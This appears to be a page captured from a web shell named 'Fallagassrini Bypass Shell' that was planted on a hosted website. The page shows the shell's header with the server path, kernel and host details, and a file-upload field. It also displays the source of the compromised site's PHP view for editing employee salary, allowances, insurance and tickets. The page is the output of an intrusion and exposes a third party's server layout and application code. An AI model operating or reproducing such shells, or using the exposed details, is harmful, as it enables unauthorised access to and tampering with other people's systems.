? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sgms/application/views/HR/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sgms/application/views/HR/edit_employee_salary.php

<?php
    if ( ! defined('BASEPATH')) exit('No direct script access allowed');
    $this->load->view('documentreadyfunctions');
    $this->load->view('commonfunctions');
    $this->load->view('hrfunctions');
?>
<script language="javascript" type="text/javascript">
    jQuery(document).ready(function()
    {
        suggestemployee('employee');
    });
</script>

<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('hr','viewinhrsearch','search_employee_salary','view_employee_salary','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  /></label>
    <span class="heading">Update Salary Settings</span>
</div>
<fieldset>
<?php
    $attributes=array('id'=>'validateform','class'=>'customForm');
    echo form_open('hr/addinhr/update_employee_salary/view_employee_salary/1',$attributes);
    $allowdeduc = $this->mastermodel->getdatas('allowdeduc','allowdeduc_id');
    $employee_salary_allowdeduc = $this->mastermodel->getdatas('employee_salary_allowdeduc','employee_salary_id');
    $curency = $this->mastermodel->getdatas('currency','currency_id');
?>
<ul>
    <li>
        <label for="data">Employee Name</label>
            <div class="record_entry">
                <?=$this->mastermodel->getSingleFieldValue('employee','employee_name','employee_id',$viewinfo->employee_id);?>
            </div>
    </li>
    <li>
        <label for="data">W.F.E Date</label>
        <?php
            $data = array(
            'name'        => 'wef_date',
            'id'          => 'wef_date',
            'class'       => 'calfocus required',
            'value'       => $this->mastermodel->convertdatenormalformat($viewinfo->wef_date)
            );
            echo form_input($data).form_error($data);
        ?>
    </li>
    <li>
            <label for="data">Basic Salary</label>
            <input type="text" name="basic_salary" id="basic_salary" value="<?=$viewinfo->basic_salary;?>" class="required auto" onblur="changebasicsalary(this.value)"/>


        </li>
    <br/><br/>
    <caption>Allowance/Deduction Details</caption><br/><br/>
    <table class="sort">
        <tr>
            <th align="center">Title</th>
            <th align="center">Mode</th>
            <th align="center">Amount/Percentage</th>
            <th align="center">Sub Total</th>
            <th align="center">Type</th>
        </tr>
        <?php
        $i=1;
        $tot_allowance=0;
        $tot_deduct =0;
        $dept=$this->mastermodel->get_data('allowdeduc','1','allowdeduc_type');
        foreach($dept as $dep)
        {
            $basicsalary = $viewinfo->basic_salary;
            if($dep['allowdeduc_mode']==1)
                $mode="Direct Amount";
            else
                $mode="Percentage";
            ?>
            <tr>
                <td><?=$dep['allowdeduc_name'];?><input type="hidden" value ="<?=$dep['allowdeduc_id'];?>" name="allowdeduc_id_<?=$i;?>"/> </td>
                <td><?=$mode?></td>
                <?php
                $amount_allowdeduc=$this->mastermodel->get_data_dual_srow('employee_salary_allowdeduc',$dep['allowdeduc_id'],'allowdeduc_id',$viewinfo->employee_salary_id,'employee_salary_id');
                if(!empty ($amount_allowdeduc))
                    $allowdeduc_amount = $amount_allowdeduc->amount;
                else
                    $allowdeduc_amount=0;
                ?>
                <td><input style="width:75px;"  class="auto" value="<?=$allowdeduc_amount;?>" type="text" name="amount_<?=$i;?>" id="amount_<?=$i;?>" onblur="calculteallowancetotal(this.value,<?=$dep['allowdeduc_mode']?>,<?=$i?>)"/>
                <?php 
                if($dep['allowdeduc_mode']==0)
                    echo '%';
                ?>
                </td>
                <?php
                if($dep['allowdeduc_mode']==0)
                    $allototal= $allowdeduc_amount/100*$basicsalary;
                else
                    $allototal=$allowdeduc_amount;
                $tot_allowance+= $allototal;
                ?>
                <td><input type="text"  class="auto" name="alltotal_<?=$i?>" id="alltotal_<?=$i?>" value="<?=$allototal;?>" readonly /></td>
                <td>Allowance</td>
            </tr>
            <?php
            $i++;
        }
        ?>
        <input type="hidden" name="allowcount" id="allowcount" value="<?=$i?>" />
        <?php
        $dept=$this->mastermodel->get_data('allowdeduc','0','allowdeduc_type');
        foreach($dept as $dep)
        {
            if($dep['allowdeduc_mode']==1)
                $mode="Direct Amount";
            else
                $mode="Percentage";
            ?>
            <?php   
            $amount_allowdeduc=$this->mastermodel->get_data_dual_srow('employee_salary_allowdeduc',$dep['allowdeduc_id'],'allowdeduc_id',$viewinfo->employee_salary_id,'employee_salary_id');
            $allowdeduc_amount = $amount_allowdeduc->amount;
            if($dep['allowdeduc_mode']==0)
                $allototal= $allowdeduc_amount/100*$basicsalary;
            else
                $allototal=$allowdeduc_amount;
            ?>
            <tr>
                <td><?=$dep['allowdeduc_name'];?><input type="hidden" value ="<?=  $dep['allowdeduc_id'];?>" name="allowdeduc_id_<?=$i;?>"/></td>
                <td><?=$mode?></td>
                <td><input type="text"  class="auto" onblur="calcultedeductiontotal(this.value,<?=$dep['allowdeduc_mode']?>,<?=$i?>)" name="amount_<?=$i?>" value="<?=$allowdeduc_amount;?>" id="amount_<?=$i?>" style="width:75px;"/>
                    <?php 
                    if($dep['allowdeduc_mode']==0)
                        echo '%';
                    ?>
                </td>
                <?php
                if($dep['allowdeduc_mode']==0)
                    $dedtotal= $allowdeduc_amount/100*$basicsalary;
                else
                    $dedtotal=$allowdeduc_amount;
                $tot_deduct = $dedtotal;
                ?>
                <td><input type="text"  class="auto" name="dedtotal_<?=$i?>" id="dedtotal_<?=$i?>" value="<?=$dedtotal;?>" readonly /></td>
                <td>Deduction</td>
            </tr>
            <?php
            $i++;
        }
        ?>
        <input type="hidden" name="dedcount" id="dedcount" value="<?=$i?>" />
    </table>
    <br/><br/>
    <caption>Salary Details</caption><br/><br/>
    <table class="sort" cellpadding="0" cellspacing="0" width="200px;">
        <tr>
            <th>Allowance</th>
            <th>Deduction</th>
        </tr>
        <tr>
            <td><input type="text"  class="auto" readonly style="width:80%" name="allowance" id="allowance" value="<?php echo $tot_allowance; ?>"></td>
            <td><input type="text"  class="auto" style="width:80%" readonly name="deduction" id="deduction" value="<?php echo $tot_deduct ; ?>"></td>
        </tr>
        <tr>
            <th>Gross Salary</th>
            <th>Net Salary</th>
        </tr>
        <tr>
            <td><input type="text"  class="auto" readonly style="width:80%" name="grosssalary" id="grosssalary" value="<?php echo $basicsalary + $tot_allowance; ?>"></td>
            <td><input type="text"  class="auto" style="width:80%" readonly name="netsalary" id="netsalary" value="<?php echo ($basicsalary + $tot_allowance) - $tot_deduct ; ?>"></td>
        </tr>
    </table>
    <br/><br/>
    <li>
        <label for="data">Payment Method</label>
        <select name="payment_method" id="payment_method" class="required">
            <option value="Cheque" <?php if($viewinfo->payment_method == "Cheque"){ echo "selected"; } ?>>Cheque</option>
            <option value="Bank Transfer" <?php if($viewinfo->payment_method == "Bank Transfer"){ echo "selected"; } ?>>Bank Transfer</option>
        </select>
    </li>
    <br/><br/>
    <caption>Insurance Details</caption><br/><br/>
    <table class="sort" cellpadding="0" cellspacing="0" width="200px;">
        <tr>
            <th width="20%">Type of Insurance</th>
            <th width="20%">Insurance Company</th>
            <th width="20%">Policy No</th>
            <th width="20%">Plan Name</th>
            <th width="20%">Sum Insured</th>
            <th width="20%"><input type="button" style="width:150px;" id="button2" value="Add More" class="addRow" title="Add Row"/></th>
        </tr>
        <?php
        $insuranceDetails=$this->mastermodel->get_data('employee_salary_medical',$viewinfo->employee_salary_id,'employee_salary_id');
        $k=1;
        foreach($insuranceDetails as $insu)
        {
        ?>
        <tr>
            <td><input type="text" style="width:70px;"  name="type"<?= $k ?> value="<?= $insu['type'] ?>" /></td>
            <td><input type="text" style="width:70px;"  name="company"<?= $k ?> value="<?= $insu['company'] ?>"/></td>
            <td><input type="text" style="width:70px;"  name="policy"<?= $k ?> value="<?= $insu['policy'] ?>"/></td>
            <td><input type="text" style="width:70px;" name="plan"<?= $k ?> value="<?= $insu['plan'] ?>"/></td>
            <td><input type="text" style="width:70px;" class="number" name="sum"<?= $k ?> value="<?= $insu['sum'] ?>"/></td>
            <td><img style="float: right; vertical-align: top;"src="<?=base_url()?>assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/></td>
        </tr>
        <?php
        }
        ?>
    </table>

 <br/><br/>

                <caption>Annual Ticket Settings</caption>
<li>
<label>From:</label>
<input type="text" name="from_ticket" id="from_ticket" value="<?= $viewinfo->from_ticket ?>"/>
<label>&nbsp;&nbsp;&nbsp;&nbsp; To:</label>
<input type="text"  name="to_ticket" id="to_ticket" value="<?= $viewinfo->to_ticket ?>"/>
<label>&nbsp;&nbsp;&nbsp;&nbsp;Return Ticket</label>
<input type="checkbox" name="return_ticket" value="1" <?php if($viewinfo->return_ticket=='1'){ echo 'checked="checked"' ;}?> />
</li>
<li>
<label for="data">No.of Tickets</label>
<input type="text" style="width:70px;"  name="no_tickets" id="no_tickets" value="<?= $viewinfo->no_tickets ?>"/>
</li>
<li>
<input type="hidden" name="employee_salary_id" id="employee_salary_id" value="<?= $viewinfo->employee_salary_id ?>"  />
<input type="hidden" name="tab_name" value="employee_salary"/>
<input type="hidden" name="employee_id" value="<?= $viewinfo->employee_id ?>"/>
<label for="submit">&nbsp;</label>
<button type="submit"  class="clickimage" onclick="addformdata('validateform')">Save</button>
</li>
</ul>

<?php echo form_close();?>
</fieldset>




bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net